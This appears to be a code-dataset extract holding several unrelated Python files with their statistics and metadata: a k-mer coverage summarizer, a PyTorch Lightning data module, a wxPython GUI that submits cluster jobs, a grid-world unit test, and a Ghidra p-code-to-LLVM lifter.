'kmer_cov_max': result['kmer_cov_max'],
'non_zero_kmer_cov_min': result['non_zero_kmer_cov_min'],
'non_zero_kmer_cov_mean': result['non_zero_kmer_cov_mean'],
'non_zero_kmer_cov_median': result['non_zero_kmer_cov_median'],
'non_zero_kmer_cov_max': result['non_zero_kmer_cov_max']
}
output_handle.write(("\t".join([
str(row[col]) for col in SAMPLE_COLS
])))
output_handle.write("\n")
def print_kmer_summary(file_output):
"""Print the final per kmer summaries."""
with open(file_output, 'w') as output_handle:
output_handle.write(("\t".join(KMER_COLS)))
output_handle.write("\n")
for kmer, coverages in KMERS.items():
for coverage in coverages:
within_group = get_coverage_stats(
KMERS[kmer][coverage]['group_coverages']
)
outgroup = get_coverage_stats(
KMERS[kmer][coverage]['outgroup_coverages']
)
row = {
'kmer': kmer,
'simulated_coverage': coverage,
'group': args.group,
'hamming_distance': HAMMING[kmer],
'tp': KMERS[kmer][coverage]['tp'],
'tn': KMERS[kmer][coverage]['tn'],
'fp': KMERS[kmer][coverage]['fp'],
'fn': KMERS[kmer][coverage]['fn'],
'group_kmer_cov_min': within_group['min'],
'group_kmer_cov_mean': within_group['mean'],
'group_kmer_cov_median': within_group['median'],
'group_kmer_cov_max': within_group['max'],
'non_zero_group_kmer_cov_min': within_group['non_zero_min'],
'non_zero_group_kmer_cov_mean': within_group['non_zero_mean'],
'non_zero_group_kmer_cov_median': within_group['non_zero_median'],
'non_zero_group_kmer_cov_max': within_group['non_zero_max'],
'outgroup_kmer_cov_min': outgroup['min'],
'outgroup_kmer_cov_mean': outgroup['mean'],
'outgroup_kmer_cov_median': outgroup['median'],
'outgroup_kmer_cov_max': outgroup['max'],
'non_zero_outgroup_kmer_cov_min': outgroup['non_zero_min'],
'non_zero_outgroup_kmer_cov_mean': outgroup['non_zero_mean'],
'non_zero_outgroup_kmer_cov_median': outgroup['non_zero_median'],
'non_zero_outgroup_kmer_cov_max': outgroup['non_zero_max'],
}
output_handle.write(("\t".join([
str(row[col]) for col in KMER_COLS
])))
output_handle.write("\n")
def read_lines(input_file):
"""Return lines in a text file as a list."""
lines = []
with open(input_file, 'r') as input_handle:
for line in input_handle:
lines.append(line.rstrip())
return lines
def parse_filter_kmers(kmers):
with open(kmers, 'r') as kmer_handle:
for line in kmer_handle:
if line.startswith(">"):
line = line.rstrip().replace(">", "")
KMERS[line.split("-")[0]] = True
if __name__ == '__main__':
parser = ap.ArgumentParser(
prog='summarize-kmer-counts.py', conflict_handler='resolve',
description=("Summarize kmer counts of each simulation.")
)
parser.add_argument('summary', type=str, metavar="SUMMARY",
help='Summary of Bacillus genomes.')
parser.add_argument('directory', type=str, metavar="SIMUALTION_DIR",
help='Directory with group specific 31-mer counts.')
parser.add_argument('group', type=str, metavar="GROUP",
help='Which group to parse (ba, bcg or lef).')
parser.add_argument('kmers', type=str, metavar="KMERS",
help='Group specific k-mers.')
parser.add_argument('coverages', type=str, metavar="COVERAGES",
help=('Coverages to subsample to.'))
parser.add_argument('outdir', type=str, metavar="OUTDIR",
help='Directory to output to.')
parser.add_argument('--cpu', default=1, type=int, metavar="INT",
help='Number of cores to use (Default: 1)')
parser.add_argument('--single_sample', type=str, metavar="STR",
help='Process a single sample.')
parser.add_argument('--skip_kmers', action='store_true', default=False,
help='Skip kmer processing.')
parser.add_argument('--filter', action='store_true', default=False,
help='Filter counts based on input kmers.')
args = parser.parse_args()
if args.group not in ['ba', 'bcg', 'lef']:
raise Exception("GROUPS must be 'ba', 'bcg' or 'lef'")
coverages = read_lines(args.coverages)
print("Parsing Summary")
parse_summary(args.summary)
print("Parsing Kmers")
if args.filter:
print("Filtering Kmers")
args.skip_kmers = True
parse_filter_kmers(args.kmers)
else:
print("Parsing Kmers")
parse_kmers(args.kmers, coverages, skip_kmers=args.skip_kmers,
has_hamming=False if args.group == 'lef' else True)
total_kmers = len(KMERS)
current = 1
samples = list(SAMPLES.keys())
if args.single_sample:
samples = [args.single_sample]
total = len(samples)
for sample in samples:
path = "{0}/{1}".format(args.directory, sample)
if os.path.exists(path):
print("Working on {0} ({1} of {2})".format(sample, current, total))
current += 1
count_files = sorted(glob.glob(
"{0}/*-{1}.txt.gz".format(path, args.group)
))
for count_file in count_files:
coverage = os.path.basename(count_file).split('-')[1]
parse_counts(count_file, sample, coverage, args.group,
skip_kmers=args.skip_kmers,
filter_kmers=args.filter)
print("Output sample summary")
if args.single_sample:
print_sample_summary("{0}/count-summary-{1}-{2}.txt".format(
args.outdir, args.single_sample, args.group
))
else:
print_sample_summary("{0}/count-summary-sample-{1}.txt".format(
args.outdir, args.group
))
if not args.skip_kmers:
print("Output kmer summary")
if args.single_sample:
print_kmer_summary("{0}/count-summary-kmer-{1}-{2}.txt".format(
args.outdir, args.single_sample, args.group
))
else:
print_kmer_summary("{0}/count-summary-kmer-{1}.txt".format(
args.outdir, args.group
))
| 40.408602
| 87
| 0.549494
| 1,738
| 15,032
| 4.478711
| 0.116801
| 0.057554
| 0.020555
| 0.028777
| 0.434481
| 0.3398
| 0.212616
| 0.13335
| 0.103931
| 0.098535
| 0
| 0.006367
| 0.320849
| 15,032
| 371
| 88
| 40.51752
| 0.756098
| 0.033196
| 0
| 0.181818
| 0
| 0
| 0.220811
| 0.082234
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031348
| false
| 0
| 0.028213
| 0
| 0.0721
| 0.040752
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d9b42548010e4777afbfec7a0536b09a13b146
| 1,883
|
py
|
Python
|
src/data/dataModule.py
|
mikkelfo/Title-prediction-from-abstract
|
45c9b64c963ae9b00c6b34a3f2b9f7c25496350e
|
[
"MIT"
] | null | null | null |
src/data/dataModule.py
|
mikkelfo/Title-prediction-from-abstract
|
45c9b64c963ae9b00c6b34a3f2b9f7c25496350e
|
[
"MIT"
] | null | null | null |
src/data/dataModule.py
|
mikkelfo/Title-prediction-from-abstract
|
45c9b64c963ae9b00c6b34a3f2b9f7c25496350e
|
[
"MIT"
] | null | null | null |
from typing import Optional
import pytorch_lightning as pl
import torch
from omegaconf import OmegaConf
from torch.utils.data import DataLoader, random_split
from transformers import T5Tokenizer
from src.data.PaperDataset import PaperDataset
class ArvixDataModule(pl.LightningDataModule):
def __init__(self, config: str = "src/data/config.yaml") -> None:
super().__init__()
self.config = OmegaConf.load(config)
def prepare_data(self) -> None:
# Add tokenizing
tokenizer = T5Tokenizer.from_pretrained("t5-base")
titles, abstracts = torch.load("data/processed/data.pt").T
#titles, abstracts = torch.load("data/processed/data.pt").T
tokenized_abstracts = tokenizer.batch_encode_plus(
abstracts, padding=True, truncation=True, return_tensors="pt"
)
tokenized_titles = tokenizer.batch_encode_plus(
titles, padding=True, truncation=True, return_tensors="pt"
)
self.data = PaperDataset(tokenized_abstracts, tokenized_titles)
def setup(self, stage: Optional[str] = None):
train, val, test = random_split(
self.data,
[self.config.n_train, self.config.n_val, self.config.n_test],
generator=torch.Generator().manual_seed(1337),
)
if stage == "fit" or stage is None:
self.train_set = train
self.val_set = val
if stage == "test":
self.test_set = test
def train_dataloader(self) -> DataLoader:
return DataLoader(self.train_set, batch_size=32, num_workers=4)
def val_dataloader(self) -> DataLoader:
return DataLoader(self.val_set, batch_size=32, num_workers=4)
def test_dataloader(self) -> DataLoader:
return DataLoader(self.test_set, batch_size=32, num_workers=4)
if __name__ == "__main__":
dm = ArvixDataModule()
| 32.465517
| 73
| 0.669676
| 227
| 1,883
| 5.334802
| 0.330396
| 0.069364
| 0.02725
| 0.074319
| 0.314616
| 0.314616
| 0.205615
| 0.11891
| 0.072667
| 0
| 0
| 0.011019
| 0.22889
| 1,883
| 57
| 74
| 33.035088
| 0.823003
| 0.038237
| 0
| 0
| 0
| 0
| 0.037611
| 0.012168
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.175
| 0.075
| 0.425
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d9d4fd434e21de06a534a9b7ddf3881191564e
| 10,573
|
py
|
Python
|
shs/gui/RootFrame.py
|
ansobolev/shs
|
7a5f61bd66fe1e8ae047a4d3400b055175a53f4e
|
[
"MIT"
] | 1
|
2016-06-22T13:30:25.000Z
|
2016-06-22T13:30:25.000Z
|
shs/gui/RootFrame.py
|
ansobolev/shs
|
7a5f61bd66fe1e8ae047a4d3400b055175a53f4e
|
[
"MIT"
] | 1
|
2017-12-01T04:49:45.000Z
|
2017-12-01T04:49:45.000Z
|
shs/gui/RootFrame.py
|
ansobolev/shs
|
7a5f61bd66fe1e8ae047a4d3400b055175a53f4e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import time
import subprocess
import wx
import ConfigParser
from wx.lib.mixins.listctrl import getListCtrlSelection
from wx.lib.pubsub import pub
from gui.RootGUI import RootGUI
from StepsDialog import StepsDialog
from PlotFrame import PlotFuncFrame, PlotCorrFrame
import interface
import mbox
class RootFrame(RootGUI):
calcs = []
plot_frame = None
def __init__(self, *args, **kwds):
super(RootFrame, self).__init__(*args, **kwds)
# set root
self.root = self.set_root()
# initialize choices
self.propChoices = interface.dataClasses()
calc_data_types = self.propChoices.types()
calc_data_classes = self.propChoices.classes(calc_data_types[0])
corr_classes = self.propChoices.classes("Histogram")
self.propType.SetItems(calc_data_types)
self.propChoice.SetItems(calc_data_classes)
self.xCorr.SetItems(corr_classes)
self.yCorr.SetItems(corr_classes)
self.propType.SetSelection(0)
self.propChoice.SetSelection(0)
self.xCorr.SetSelection(0)
self.yCorr.SetSelection(0)
# initialize calc tree
self.build_tree(self.root, self.typeRBox.GetItemLabel(self.typeRBox.GetSelection()))
# initialize calc list
self.calcList.InsertColumn(0, 'Directory', width=180)
self.calcList.InsertColumn(1, 'Type', width=70)
self.calcList.InsertColumn(2, 'NSteps', width=100)
def set_root(self):
"""
Sets root directory fr GUI based on config file
:return: Root directory
"""
config_dir = os.path.expanduser("~/.local/shs")
config_file = os.path.join(config_dir, "shs_gui.cfg")
# check the file and create one if it's not there
if not os.path.isfile(config_file):
os.makedirs(config_dir)
open(config_file, 'w').close()
config = ConfigParser.ConfigParser()
config.read(config_file)
# if config exists and has needed option
if config.has_option("general", "root_dir"):
return config.get("general", "root_dir")
# make config
if not config.has_section("general"):
config.add_section("general")
dlg = wx.DirDialog(self, "Select root directory")
if dlg.ShowModal() == wx.ID_OK:
root_dir = dlg.GetPath()
config.set("general", "root_dir", root_dir)
else:
sys.exit(1)
with open(config_file, 'w') as f:
config.write(f)
return root_dir
def build_tree(self, root, calc_type):
"""
Adds a new root element and then its children
:param root: root directory for the tree
:param calc_type: calculation type
"""
self.calcTree.DeleteAllItems()
r = len(root.split(os.sep))
ids = {root: self.calcTree.AddRoot(root)}
for (dir_path, dir_names, file_names) in os.walk(root):
if interface.isCalcOfType(calc_type, dn=dir_names, fn=file_names):
# find the number of steps in MDE file, quickly
nsteps = interface.GetNumMDESteps(dir_path)
ancdirs = dir_path.split(os.sep)[r:]
if nsteps is not None:
ancdirs[-1] += ' [%i]' % nsteps
ad = root
for ancdir in ancdirs:
d = os.path.join(ad, ancdir)
if not d in ids:
ids[d] = self.calcTree.AppendItem(ids[ad], ancdir)
self.calcTree.SortChildren(ids[ad])
ad = d
def get_selection_dir(self):
item = self.calcTree.GetSelection()
parent = self.calcTree.GetItemParent(item)
path = [self.calcTree.GetItemText(item)]
while parent.IsOk():
path.append(self.calcTree.GetItemText(parent))
parent = self.calcTree.GetItemParent(parent)
# calculation directory
calc_dir = os.sep.join(path[::-1]).split()[0]
return calc_dir
# return os.sep.join((self.root, calc_dir))
def onSelChange(self, event):
# calculation type
ctype = self.typeRBox.GetItemLabel(self.typeRBox.GetSelection())
# calculation directory
cdir = self.get_selection_dir()
if interface.isCalcOfType(ctype, dir=cdir):
self.enqueueBtn.Enable()
else:
self.enqueueBtn.Enable(False)
def propTypeChange(self, event):
# property type
pt_num = self.propType.GetSelection()
pt = self.propType.GetItems()[pt_num]
self.propChoice.SetItems(self.propChoices.classes(pt))
self.propChoice.SetSelection(0)
def typeChange(self, event):
ctype = self.typeRBox.GetItemLabel(self.typeRBox.GetSelection())
self.build_tree(self.root, ctype)
def upBtnPress(self, event):
# selection indices
sind = getListCtrlSelection(self.calcList)
if sind:
# number of deleted strings
ds = 0
for si in sind:
self.calcs.pop(si - ds)
self.calcList.DeleteItem(si - ds)
ds += 1
return 0
return 1
def downBtnPress(self, event):
# current list count
clc = self.calcList.GetItemCount()
# calculation type
ctype = self.typeRBox.GetItemLabel(self.typeRBox.GetSelection())
# calculation directory
cdir = self.get_selection_dir()
if not interface.isCalcOfType(ctype, dir=cdir):
mbox.NoResults(cdir, ctype)
return 1
# init steps range
r = None
if ctype in ('.output', '.ANI'):
# enter dialog
dlg = StepsDialog(None)
if dlg.ShowModal() == wx.ID_OK:
r = dlg.GetRange()
dlg.Destroy()
self.calcs.append(interface.getCalc(cdir, ctype, r))
self.calcList.InsertStringItem(clc, cdir[len(self.root)+1:])
self.calcList.SetStringItem(clc, 1, ctype)
self.calcList.SetStringItem(clc, 2, str(len(r)) if r is not None else '')
return 0
def on_enqueue_press(self, _):
from sshutils import getMount, getDevice, getRemoteDir
# on which device are we?
calc_dir = self.get_selection_dir()
mount_path = getMount(calc_dir)
device_name, device_type = getDevice(mount_path)
if 'ssh' in device_type:
user, host_dir = device_name.split('@')
hostname, remote_mount_path = host_dir.split(':')
remote_dir = getRemoteDir(calc_dir, mount_path, remote_mount_path)
self.enqueue_remote(remote_dir, hostname, user)
else:
self.enqueue_local(calc_dir)
@staticmethod
def enqueue_local(calc_dir):
"""
Enqueue a task on a local filesystem
:param calc_dir: calculation directory on a local filesystem
:return: error_code (0 is OK)
"""
import distutils.spawn
# find which queue system is implemented on cluster (qstat - PBS, sinfo - SLURM)
if distutils.spawn.find_executable('qstat') is not None:
q = 'pbs'
elif distutils.spawn.find_executable('sinfo') is not None:
q = 'slurm'
else:
mbox.JobSubmit(None, ())
return -1
comm = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', q, q + '.sh'))
submit = subprocess.Popen(['/bin/bash', comm, '-d=' + calc_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
mbox.JobSubmit(q, submit.communicate())
@staticmethod
def enqueue_remote(calc_dir, host, user):
"""
Enqueue a task on a remote filesystem
:param calc_dir: calculation directory on a remote filesystem
:param host: host where to enqueue a task
:param user: user of a remote system who enqueues a task
:return: error code (0 is OK)
"""
from sshutils import getSSHClient, getQueue, copyFile, removeFile, runCommand
ssh = getSSHClient(host, user)
# find which queue system is implemented on cluster (qstat - PBS, sinfo - SLURM)
q = getQueue(ssh)
if q is None:
mbox.JobSubmit(None, ())
return None
# queue putter on a local machine
local_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', q))
putter = q + '.sh'
sftp = copyFile(ssh, putter, local_dir, calc_dir)
remote_file = os.path.join(calc_dir, putter)
stdout, stderr = runCommand(ssh, 'bash ' + remote_file + ' -d=' + calc_dir)
mbox.JobSubmit(q, ('\n'.join(stdout.readlines()), '\n'.join(stderr.readlines())))
removeFile(sftp, remote_file)
ssh.close()
def plotBtnPress(self, event):
if self.noteBook.GetSelection() == 0:
self.plot_property()
else:
self.plot_correlation()
def plot_property(self):
# plot options - get all the data to plot
ptype = self.propType.GetItems()[self.propType.GetSelection()]
pchoice = self.propChoice.GetItems()[self.propChoice.GetSelection()]
data_class = self.propChoices.dataClass(ptype, pchoice)
leg = [self.calcList.GetItemText(i) for i in getListCtrlSelection(self.calcList)]
t1 = time.clock()
plot_data = interface.getData(ptype, data_class, leg,
[self.calcs[i] for i in getListCtrlSelection(self.calcList)])
self.SetStatusText('Calculation time: %7.2f s.' % (time.clock() - t1))
msg = plot_data
try:
self.plot_frame.Raise()
except (AttributeError, wx.PyDeadObjectError):
self.plot_frame = PlotFuncFrame(self)
self.plot_frame.Show()
pub.sendMessage('data.plot', message=msg)
def plot_correlation(self):
# correlate options - get all the data to plot
xchoice = self.xCorr.GetSelection()
ychoice = self.yCorr.GetSelection()
leg = [self.calcList.GetItemText(i) for i in getListCtrlSelection(self.calcList)]
data, info = interface.getCorr(xchoice, ychoice, [self.calcs[i] for i in getListCtrlSelection(self.calcList)])
msg = [leg, data, info]
try:
self.plot_frame.Raise()
except (AttributeError, wx.PyDeadObjectError):
self.plot_frame = PlotCorrFrame(self)
self.plot_frame.Show()
pub.sendMessage('corr.plot', message=msg)
| 39.01476
| 120
| 0.608909
| 1,240
| 10,573
| 5.083871
| 0.243548
| 0.028553
| 0.012373
| 0.017767
| 0.215419
| 0.189245
| 0.16894
| 0.14118
| 0.126904
| 0.111675
| 0
| 0.005157
| 0.284782
| 10,573
| 270
| 121
| 39.159259
| 0.828485
| 0.127873
| 0
| 0.160804
| 0
| 0
| 0.027796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075377
| false
| 0
| 0.080402
| 0
| 0.21608
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5dc3b0ac30486b996b5ad01fe0ad1a247834e86
| 1,411
|
py
|
Python
|
srl/simulation_test.py
|
google/simple-reinforcement-learning
|
9bdac29427cd5c556d7ea7531b807645f043aae3
|
[
"Apache-2.0"
] | 60
|
2017-01-10T06:35:11.000Z
|
2020-12-19T07:33:40.000Z
|
srl/simulation_test.py
|
google/simple-reinforcement-learning
|
9bdac29427cd5c556d7ea7531b807645f043aae3
|
[
"Apache-2.0"
] | null | null | null |
srl/simulation_test.py
|
google/simple-reinforcement-learning
|
9bdac29427cd5c556d7ea7531b807645f043aae3
|
[
"Apache-2.0"
] | 29
|
2017-01-11T22:15:36.000Z
|
2022-03-17T02:17:37.000Z
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import unittest
from srl import movement
from srl import simulation
from srl import world
class TestSimulation(unittest.TestCase):
def test_in_terminal_state(self):
w = world.World.parse('@^')
sim = simulation.Simulation(world.Static(w))
self.assertFalse(sim.in_terminal_state)
sim.act(movement.ACTION_RIGHT)
self.assertTrue(sim.in_terminal_state)
def test_act_accumulates_score(self):
w = world.World.parse('@.')
sim = simulation.Simulation(world.Static(w))
sim.act(movement.ACTION_RIGHT)
sim.act(movement.ACTION_LEFT)
self.assertEqual(-2, sim.score)
def test_to_array(self):
w = world.World.parse('$.@^#')
sim = simulation.Simulation(world.Static(w))
self.assertTrue(
(np.array([[2, 3, 4, 5, 1]], dtype=np.int8) == sim.to_array())
.all())
| 32.068182
| 74
| 0.722892
| 207
| 1,411
| 4.850242
| 0.487923
| 0.059761
| 0.038845
| 0.044821
| 0.222112
| 0.172311
| 0.172311
| 0.172311
| 0.172311
| 0.172311
| 0
| 0.012766
| 0.167257
| 1,411
| 43
| 75
| 32.813953
| 0.841702
| 0.388377
| 0
| 0.208333
| 0
| 0
| 0.010601
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.125
| false
| 0
| 0.208333
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5dc76ad37d386c3045e8ed5404e25dd2364d605
| 26,564
|
py
|
Python
|
src/xmltollvm.py
|
Tejvinder/thesis-ghidra
|
2e59bc48d6bb820ecf6b390e5cf5893fc6ea0216
|
[
"MIT"
] | 101
|
2019-10-22T09:48:19.000Z
|
2022-03-30T07:03:40.000Z
|
src/xmltollvm.py
|
Tejvinder/thesis-ghidra
|
2e59bc48d6bb820ecf6b390e5cf5893fc6ea0216
|
[
"MIT"
] | 4
|
2020-03-06T14:18:47.000Z
|
2021-11-05T04:10:59.000Z
|
src/xmltollvm.py
|
Tejvinder/thesis-ghidra
|
2e59bc48d6bb820ecf6b390e5cf5893fc6ea0216
|
[
"MIT"
] | 15
|
2019-10-22T13:12:39.000Z
|
2022-03-04T20:08:06.000Z
|
from llvmlite import ir
import xml.etree.ElementTree as et
int32 = ir.IntType(32)
int64 = ir.IntType(64)
int1 = ir.IntType(1)
void_type = ir.VoidType()
function_names = []
registers, functions, uniques, extracts = {}, {}, {}, {}
internal_functions = {}
memory = {}
flags = ["ZF", "CF", "OF", "SF"]
pointers = ["RSP", "RIP", "RBP", "EBP", "ESP"]
def lift(filename):
root = et.parse(filename).getroot()
module = ir.Module(name="lifted")
for register in root.find('globals').findall('register'):
if register.get('name') in flags:
var = ir.GlobalVariable(module, ir.IntType(1), register.get('name'))
var.initializer = ir.Constant(ir.IntType(1), None)
var.linkage = 'internal'
registers[register.get('name')] = var
elif register.get('name') in pointers:
var = ir.GlobalVariable(module, ir.PointerType(ir.IntType(8)), register.get('name'))
var.initializer = ir.Constant(ir.PointerType(ir.IntType(8)), None)
var.linkage = 'internal'
registers[register.get('name')] = var
else:
var = ir.GlobalVariable(module, ir.IntType(8 * int(register.get('size'))), register.get('name'))
var.initializer = ir.Constant(ir.IntType(8 * int(register.get('size'))), None)
var.linkage = 'internal'
registers[register.get('name')] = var
for memory_location in root.find('memory').findall('memory'):
var = ir.GlobalVariable(module, ir.IntType(8 * int(memory_location.get('size'))), memory_location.get('name'))
var.initializer = ir.Constant(ir.IntType(8 * int(memory_location.get('size'))), None)
var.linkage = 'internal'
memory[memory_location.get('name')] = var
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, "intra_function_branch")
internal_functions["intra_function_branch"] = ir_func
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, "call_indirect")
internal_functions["call_indirect"] = ir_func
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, "bit_extraction")
internal_functions["bit_extraction"] = ir_func
for function in root.findall('function'):
name = function.get('name')
x = 1
while name in function_names:
name = name + "_" + str(x)
x += 1
function_names.append(name)
address = function.get('address')
functions[address] = [build_function(name, module), function]
for address in functions:
ir_func, function = functions[address]
populate_func(ir_func, function)
return module
def populate_func(ir_func, function):
builders, blocks = build_cfg(function, ir_func)
if blocks == {}:
return
populate_cfg(function, builders, blocks)
def build_function(name, module):
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, name)
return ir_func
def build_cfg(function, ir_func):
builders, blocks = {}, {}
instructions = function.find("instructions")
if instructions:
block = ir_func.append_basic_block("entry")
blocks["entry"] = block
builders["entry"] = ir.IRBuilder(block)
for instruction in instructions:
address = instruction.find("address").text
block = ir_func.append_basic_block(address)
blocks[address] = block
builders[address] = ir.IRBuilder(block)
return builders, blocks
# noinspection DuplicatedCode
def populate_cfg(function, builders, blocks):
builder = builders["entry"]
stack_size = 10 * 1024 * 1024
stack = builder.alloca(ir.IntType(8), stack_size, name="stack")
stack_top = builder.gep(stack, [ir.Constant(int64, stack_size - 8)], name="stack_top")
builder.store(stack_top, registers["RSP"])
builder.branch(list(blocks.values())[1])
block_iterator = 1
instr = 0
quiter = False
for instruction in function.find("instructions"):
if quiter:
break
address = instruction.find("address").text
if address in builders:
builder = builders[address]
pcodes = instruction.find("pcodes")
pc = 0
no_branch = True
for pcode in pcodes:
pc += 1
mnemonic = pcode.find("name")
if mnemonic.text == "COPY":
output = pcode.find("output")
if output.text in flags and pcode.find("input_0").get("storage") == "constant":
source = ir.Constant(ir.IntType(1), int(pcode.find("input_0").text, 0))
else:
source = fetch_input_varnode(builder, pcode.find("input_0"))
update_output(builder, pcode.find("output"), source)
elif mnemonic.text == "LOAD":
input_1 = pcode.find("input_1")
output = pcode.find("output")
rhs = fetch_input_varnode(builder, input_1)
if input_1.get("storage") == "unique" and output.get("storage") == "unique":
# This is incorrect. This is treating it as a copy, should load the memory address in the input 1
update_output(builder, output, rhs)
else:
if input_1.text in pointers:
rhs = builder.gep(rhs, [ir.Constant(int64, 0)])
result = builder.load(rhs)
update_output(builder, output, result)
elif mnemonic.text == "STORE":
input_1 = pcode.find("input_1") # target
input_2 = pcode.find("input_2") # source
rhs = fetch_input_varnode(builder, input_2)
lhs = fetch_output_varnode(input_1)
lhs2 = builder.gep(lhs, [ir.Constant(int64, 0)])
if lhs2.type != rhs.type.as_pointer():
lhs2 = builder.bitcast(lhs2, rhs.type.as_pointer())
builder.store(rhs, lhs2)
elif mnemonic.text == "BRANCH":
value = pcode.find("input_0").text[2:-2]
if value in functions:
target = functions[value][0]
builder.call(target, [])
elif value in blocks:
target = blocks[value]
builder.branch(target)
no_branch = False
else:
# weird jump into some label in another function
# might be solved with callbr instruction?
builder.call(internal_functions["intra_function_branch"], [])
elif mnemonic.text == "CBRANCH":
true_target = blocks[pcode.find("input_0").text[2:-2]]
false_target = list(blocks.values())[block_iterator + 1]
condition = fetch_input_varnode(builder, pcode.find("input_1"))
no_branch = False
builder.cbranch(condition, true_target, false_target)
elif mnemonic.text == "BRANCHIND":
no_branch = False
target = fetch_input_varnode(builder, pcode.find("input_0"))
if not target.type.is_pointer:
target = builder.inttoptr(target, target.type.as_pointer())
builder.branch_indirect(target)
elif mnemonic.text == "CALL":
target = functions[pcode.find("input_0").text[2:-2]][0]
builder.call(target, [])
elif mnemonic.text == "CALLIND":
# target = pcode.find("input_0").text[2:-2]
builder.call(internal_functions["call_indirect"], [])
elif mnemonic.text == "USERDEFINED":
raise Exception("Not implemented")
elif mnemonic.text == "RETURN":
input_1 = pcode.find("input_1")
no_branch = False
if input_1 is None:
builder.ret_void()
else:
raise Exception("Return value being passed")
elif mnemonic.text == "PIECE":
raise Exception("PIECE operation needs to be tested")
elif mnemonic.text == "SUBPIECE":
output = pcode.find("output")
input_0 = pcode.find("input_0")
input_1 = pcode.find("input_1")
if input_1.text == "0x0":
val = fetch_input_varnode(builder, input_0)
result = builder.trunc(val, ir.IntType(int(output.get("size")) * 8))
update_output(builder, output, result)
else:
builder.call(internal_functions['bit_extraction'], [])
elif mnemonic.text == "INT_EQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('==', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_NOTEQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('!=', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_LESS":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('<', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SLESS":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_signed('<', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_LESSEQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('<=', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SLESS_EQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_signed('<=', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_ZEXT":
rhs = fetch_input_varnode(builder, pcode.find("input_0"))
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, rhs.type.pointee)
output = builder.zext(rhs, ir.IntType(int(pcode.find("output").get("size")) * 8))
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SEXT":
rhs = fetch_input_varnode(builder, pcode.find("input_0"))
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, rhs.type.pointee)
output = builder.sext(rhs, ir.IntType(int(pcode.find("output").get("size")) * 8))
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_ADD":
